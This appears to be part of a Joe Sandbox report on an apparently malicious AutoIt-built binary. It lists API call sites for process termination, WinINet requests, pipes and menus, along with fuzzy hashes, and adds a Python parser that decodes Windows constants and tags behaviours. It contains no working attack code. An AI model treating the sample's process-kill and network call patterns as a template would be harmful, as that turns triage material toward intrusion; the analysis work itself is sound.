                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                        • String ID:
                                        • API String ID: 839392675-0
                                        • Opcode ID: f559cc35d9965d6e1e42f62ca53bbef22aae038f583f97f9407b5af05b176697
                                        • Instruction ID: 217a4be08c786e9b55c9fcf2f70d8771d4b6e338990c9fbd656a01b13140547c
                                        • Opcode Fuzzy Hash: f559cc35d9965d6e1e42f62ca53bbef22aae038f583f97f9407b5af05b176697
                                        • Instruction Fuzzy Hash: F8F01D3224115DBBE7315BA29C0DEAB7A7CFBC6B15F000169FA05D14509AA11A0596B5
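                                        The "APIs" listings in this report only give raw hex arguments, so the analyst has to recognise by hand that the sequence above (PostMessageW with 00000010, OpenProcess with 001F0FFF, then TerminateProcess) is a WM_CLOSE followed by a forced kill with PROCESS_ALL_ACCESS, that the MapVirtualKeyW block a few entries up is translating VK_LWIN, VK_SHIFT and friends to scan codes, or that HttpQueryInfoW with 00000005 at the end of this section is asking for HTTP_QUERY_CONTENT_LENGTH. The following parser is an added example written for this page, not Joe Sandbox's own tooling: it reads lines in the listing format shown here, decodes the arguments, names the Windows constants it knows about, and tags coarse behaviours from the call order. The sample listing embedded in it is constructed from lines in this report, and the constant table covers only the values that appear on this page (PROCESS_ALL_ACCESS is given its pre-Vista 0x1F0FFF value, which is what this binary uses).

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample in the format of the Joe Sandbox IDA-plugin "APIs" listing:
# the WinKill-style sequence, a subcall line, a CRT call and a WinINet query.
SAMPLE_LISTING = """\
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00EE569B
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00EE56B1
• GetWindowThreadProcessId.USER32(?,?), ref: 00EE56C0
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?), ref: 00EE56CF
• TerminateProcess.KERNEL32(00000000,00000000,?), ref: 00EE56D9
• CloseHandle.KERNEL32(00000000,?), ref: 00EE56E0
  • Part of subcall function 00ED85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00ED8608
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EA03D3
• _memset.LIBCMT ref: 00EE3077
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EF1B96
"""

# One listing line: optional "Part of subcall function XXXX:" prefix, API.MODULE,
# an optional hex argument list (CRT entries such as _memset.LIBCMT have none), and the ref address.
_LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# (API name, zero-based argument index) -> {value: symbolic name}.  Values are the Windows SDK
# constants; 0x1F0FFF is the pre-Vista PROCESS_ALL_ACCESS that older SDK headers define.
KNOWN_CONSTANTS = {
    ("PostMessageW", 1): {0x10: "WM_CLOSE"},
    ("SendMessageTimeoutW", 1): {0x10: "WM_CLOSE"},
    ("SendMessageTimeoutW", 4): {0x02: "SMTO_ABORTIFHUNG"},
    ("OpenProcess", 0): {0x1F0FFF: "PROCESS_ALL_ACCESS"},
    ("GetTokenInformation", 1): {2: "TokenGroups"},
    ("MapVirtualKeyW", 0): {0x5B: "VK_LWIN", 0x10: "VK_SHIFT", 0xA0: "VK_LSHIFT",
                            0xA1: "VK_RSHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU"},
    ("MapVirtualKeyW", 1): {0: "MAPVK_VK_TO_VSC"},
    ("HttpQueryInfoW", 1): {5: "HTTP_QUERY_CONTENT_LENGTH"},
    ("CoCreateInstance", 2): {5: "CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER"},
    ("SendMessageW", 1): {0x188: "LB_GETCURSEL", 0x189: "LB_GETTEXT", 0x18A: "LB_GETTEXTLEN"},
    ("SetErrorMode", 0): {1: "SEM_FAILCRITICALERRORS"},
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                      # int for a literal argument, None for an unresolved "?"
    ref: int                        # address of the call site
    subcall_of: Optional[int] = None  # set when the line is a "Part of subcall function" entry


def _parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    sign = -1 if tok.startswith("-") else 1     # the listing prints e.g. -00000002 for -2
    return sign * int(tok.lstrip("-"), 16)


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = _LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [_parse_arg(t) for t in raw.split(",")] if raw is not None else []
    sub = m.group("sub")
    return ApiCall(api=m.group("api"), module=m.group("mod"), args=args,
                   ref=int(m.group("ref"), 16), subcall_of=int(sub, 16) if sub else None)


def parse_listing(text: str) -> list:
    """Parse every recognisable API line; headers such as 'Strings' are skipped."""
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c is not None]


def annotate(call: ApiCall) -> list:
    """Return 'argN=0x.. NAME' strings for each argument whose symbolic value is known."""
    notes = []
    for i, v in enumerate(call.args):
        if v is None:
            continue
        name = KNOWN_CONSTANTS.get((call.api, i), {}).get(v)
        if name:
            notes.append(f"arg{i}=0x{v:X} {name}")
        if call.api == "SendMessageTimeoutW" and i == 5:
            notes.append(f"arg5={v} ms timeout")   # uTimeout is a plain millisecond count
    return notes


def summarize(calls: list) -> list:
    """Tag coarse behaviours visible in the call order (direct calls only, subcalls excluded)."""
    names = [c.api for c in calls if c.subcall_of is None]
    tags = []
    if "OpenProcess" in names and "TerminateProcess" in names \
            and names.index("OpenProcess") < names.index("TerminateProcess"):
        tags.append("kills-foreign-process")
    if any(c.api in ("PostMessageW", "SendMessageTimeoutW") and len(c.args) > 1
           and c.args[1] == 0x10 for c in calls):
        tags.append("sends-WM_CLOSE")
    if any(c.module == "WININET" for c in calls):
        tags.append("uses-wininet")
    if any(c.api == "MapVirtualKeyW" for c in calls):
        tags.append("maps-virtual-keys")
    return tags


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    for c in parsed:
        print(f"{c.ref:08X} {c.api}.{c.module} {' '.join(annotate(c))}")
    print("tags:", summarize(parsed))
```

                                        Run against a whole "APIs" block pasted from the report, the output turns each line into a named call site plus its decoded constants, and the tag list gives a first-pass behaviour label for the function. The constant table is deliberately keyed by argument position, because the same value means different things in different slots (00000010 is WM_CLOSE as a message ID but VK_SHIFT as a virtual-key code).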
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,?), ref: 00EE74E5
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00EE74F6
                                        • TerminateThread.KERNEL32(00000000,000001F6,?,00E91044,?,?), ref: 00EE7503
                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E91044,?,?), ref: 00EE7510
                                          • Part of subcall function 00EE6ED7: CloseHandle.KERNEL32(00000000,?,00EE751D,?,00E91044,?,?), ref: 00EE6EE1
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EE7523
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00EE752A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                        • String ID:
                                        • API String ID: 3495660284-0
                                        • Opcode ID: b02aefe65aa64325379c1a626878d5065da5c3f3f2a80887142a41fc9805d90c
                                        • Instruction ID: d5517d2f7e880c7739bb27479eb3b115607d3d912f206ceda49089b1f6fbe06c
                                        • Opcode Fuzzy Hash: b02aefe65aa64325379c1a626878d5065da5c3f3f2a80887142a41fc9805d90c
                                        • Instruction Fuzzy Hash: 22F0823A14071AEBDB312B64FC8C9EB7B3AFF45302B001531F642A18B4CB755909DB90
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 00EF8928
                                        • CharUpperBuffW.USER32(?,?), ref: 00EF8A37
                                        • VariantClear.OLEAUT32(?), ref: 00EF8BAF
                                          • Part of subcall function 00EE7804: VariantInit.OLEAUT32(00000000), ref: 00EE7844
                                          • Part of subcall function 00EE7804: VariantCopy.OLEAUT32(00000000,?), ref: 00EE784D
                                          • Part of subcall function 00EE7804: VariantClear.OLEAUT32(00000000), ref: 00EE7859
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                        • API String ID: 4237274167-1221869570
                                        • Opcode ID: cd83badf75d7d12a7f9aa73e4f7d028e773e2b0b76c8d4ffa7e55c88272464a5
                                        • Instruction ID: c8294cecde5d1c6b220264bf8944e65c001ca9d3a8d7dc03e22de38df69d085e
                                        • Opcode Fuzzy Hash: cd83badf75d7d12a7f9aa73e4f7d028e773e2b0b76c8d4ffa7e55c88272464a5
                                        • Instruction Fuzzy Hash: 92919E75608305DFC714EF24C58496ABBE4EFC8314F04596EF99AAB362DB30E906CB52
                                        APIs
                                          • Part of subcall function 00E9FEC6: _wcscpy.LIBCMT ref: 00E9FEE9
                                        • _memset.LIBCMT ref: 00EE3077
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EE30A6
                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EE3159
                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00EE3187
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                        • String ID: 0
                                        • API String ID: 4152858687-4108050209
                                        • Opcode ID: 711f46b9b64c50cb19571c514a747857af23b2c08d00a1c963ffc3848b609bcd
                                        • Instruction ID: 08be7c0ed94e9063c25ab368cb63f96f39630a16b112c7e37db4567d5cbfef26
                                        • Opcode Fuzzy Hash: 711f46b9b64c50cb19571c514a747857af23b2c08d00a1c963ffc3848b609bcd
                                        • Instruction Fuzzy Hash: 7251013160A3889ED7249F39C848A6BBBE8EF45368F04292DF895F3191DB70CE449752
                                        APIs
                                        • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00EDDAC5
                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00EDDAFB
                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00EDDB0C
                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00EDDB8E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                        • String ID: DllGetClassObject
                                        • API String ID: 753597075-1075368562
                                        • Opcode ID: 674441d2896f76f38baca5a7756564c72c2c0b8c6e730f1d00b5faa431ea64e1
                                        • Instruction ID: 58f94f37a34734f4fa4aea45e1ef29c63268e861a00d1bf3bb9df81d25debacf
                                        • Opcode Fuzzy Hash: 674441d2896f76f38baca5a7756564c72c2c0b8c6e730f1d00b5faa431ea64e1
                                        • Instruction Fuzzy Hash: 5F41AEB1604208EFDB14CF54CC84A9ABBA9EF48314F1591ABED05AF305D7B1DE45DBA0
                                        APIs
                                        • _memset.LIBCMT ref: 00EE2CAF
                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00EE2CCB
                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00EE2D11
                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F46890,00000000), ref: 00EE2D5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Menu$Delete$InfoItem_memset
                                        • String ID: 0
                                        • API String ID: 1173514356-4108050209
                                        • Opcode ID: 385b9620bee1c240a08213c18193988f96c8181690dfd45458d8d5444bbf31f6
                                        • Instruction ID: 0e332d9a0cf7b2917a3397d2f5af398d3ef5dbde3cd8ed4621ff50acbb240770
                                        • Opcode Fuzzy Hash: 385b9620bee1c240a08213c18193988f96c8181690dfd45458d8d5444bbf31f6
                                        • Instruction Fuzzy Hash: 2D41BF302043859FD724DF25DC44B5ABBE8BF85324F14461DFA65A7291D770E904CB92
                                        APIs
                                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EFDAD9
                                          • Part of subcall function 00E879AB: _memmove.LIBCMT ref: 00E879F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: BuffCharLower_memmove
                                        • String ID: cdecl$none$stdcall$winapi
                                        • API String ID: 3425801089-567219261
                                        • Opcode ID: dc54d557f07fec2a161132db5aa4488a24c0f6d5a967f3964ae1222a794b1173
                                        • Instruction ID: 55cda04dbcbe8e06526932b65b35a76ffbcd153038cfa0ebc329876e8158edbf
                                        • Opcode Fuzzy Hash: dc54d557f07fec2a161132db5aa4488a24c0f6d5a967f3964ae1222a794b1173
                                        • Instruction Fuzzy Hash: 7831C3715082199BCF00EF54CC809FEB7F5FF05324B10962AE969B7691CB71E906CB80
                                        APIs
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                          • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00ED93F6
                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00ED9409
                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00ED9439
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$_memmove$ClassName
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 365058703-1403004172
                                        • Opcode ID: 9e40ed183487df685cc6f538371efbdb074d91a85174ce84cb623162f99c030b
                                        • Instruction ID: 3dfbeb1a900a1280f0e93640088c16a2ef908f2c6cbf283b4a881b5d8ad8087a
                                        • Opcode Fuzzy Hash: 9e40ed183487df685cc6f538371efbdb074d91a85174ce84cb623162f99c030b
                                        • Instruction Fuzzy Hash: 0C21E471A00108AEDB14AB70CC858FFB7B8EF05760B14521AF929B72E2DB75594B9610
                                        APIs
                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EF1B40
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EF1B66
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EF1B96
                                        • InternetCloseHandle.WININET(00000000), ref: 00EF1BDD
                                          • Part of subcall function 00EF2777: GetLastError.KERNEL32(?,?,00EF1B0B,00000000,00000000,00000001), ref: 00EF278C
                                          • Part of subcall function 00EF2777: SetEvent.KERNEL32(?,?,00EF1B0B,00000000,00000000,00000001), ref: 00EF27A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                        • String ID:
                                        • API String ID: 3113390036-3916222277
                                        • Opcode ID: 52dd56c800d79aa0a36b3c32079cc739f445d2e02a8e5d57f7db53777c075396
                                        • Instruction ID: 3afdc684cb3bd1aa419d7e6c08df2fd7b930c98a73fe56b44697d757e87580db
                                        • Opcode Fuzzy Hash: 52dd56c800d79aa0a36b3c32079cc739f445d2e02a8e5d57f7db53777c075396
                                        • Instruction Fuzzy Hash: 4E219FB150420CFFEB219F619C85EBF77ECEB49748F10516AF605B6640EB209D099762
                                        APIs
                                          • Part of subcall function 00E81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E81D73
                                          • Part of subcall function 00E81D35: GetStockObject.GDI32(00000011), ref: 00E81D87
                                          • Part of subcall function 00E81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E81D91
                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F066D0
                                        • LoadLibraryW.KERNEL32(?), ref: 00F066D7
                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F066EC
                                        • DestroyWindow.USER32(?), ref: 00F066F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                        • String ID: SysAnimate32
                                        • API String ID: 4146253029-1011021900
                                        • Opcode ID: 1f65ee54165fd0e6d21ffc91710dcadec73103e690703dccea6c884e7b0ebc0d
                                        • Instruction ID: e5aea13638594fa44174b7ab1d1b1f0f7b07edd320d8add2cd53446f9d045672
                                        • Opcode Fuzzy Hash: 1f65ee54165fd0e6d21ffc91710dcadec73103e690703dccea6c884e7b0ebc0d
                                        • Instruction Fuzzy Hash: C1218B7160020AABEF104F64EC80EAB37ADEB59378F104629F911DA1E0DB72CC61B760
                                        APIs
                                        • GetStdHandle.KERNEL32(0000000C), ref: 00EE705E
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EE7091
                                        • GetStdHandle.KERNEL32(0000000C), ref: 00EE70A3
                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00EE70DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CreateHandle$FilePipe
                                        • String ID: nul
                                        • API String ID: 4209266947-2873401336
                                        • Opcode ID: 1cc25b45962437660aaaad41616913568c81663800d0cda5a32aa34b3c083ea8
                                        • Instruction ID: e2397e376cdfc7955bff22e8446b5b67d6d49d8717c18912b049993d53ec1a58
                                        • Opcode Fuzzy Hash: 1cc25b45962437660aaaad41616913568c81663800d0cda5a32aa34b3c083ea8
                                        • Instruction Fuzzy Hash: BE217C7460424DABDF209F6AE805A9A7BA8BF54724F205A19F8E0E72D0E7B09940DB50
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6), ref: 00EE712B
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EE715D
                                        • GetStdHandle.KERNEL32(000000F6), ref: 00EE716E
                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00EE71A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CreateHandle$FilePipe
                                        • String ID: nul
                                        • API String ID: 4209266947-2873401336
                                        • Opcode ID: 23cc469accf07ef07b08021a169ef16fa0030fb6040411116f4796d03eb59617
                                        • Instruction ID: 7e78fcbf33e1475e46a402463bf8eed604b02b093ea56b18f8072c726690bfc7
                                        • Opcode Fuzzy Hash: 23cc469accf07ef07b08021a169ef16fa0030fb6040411116f4796d03eb59617
                                        • Instruction Fuzzy Hash: 8F21A17560538DABDB209F6A9C04A9AB7E8BF55734F201619FCE0E32D0D7709841CB51
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 00EEAEBF
                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00EEAF13
                                        • __swprintf.LIBCMT ref: 00EEAF2C
                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F0F910), ref: 00EEAF6A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
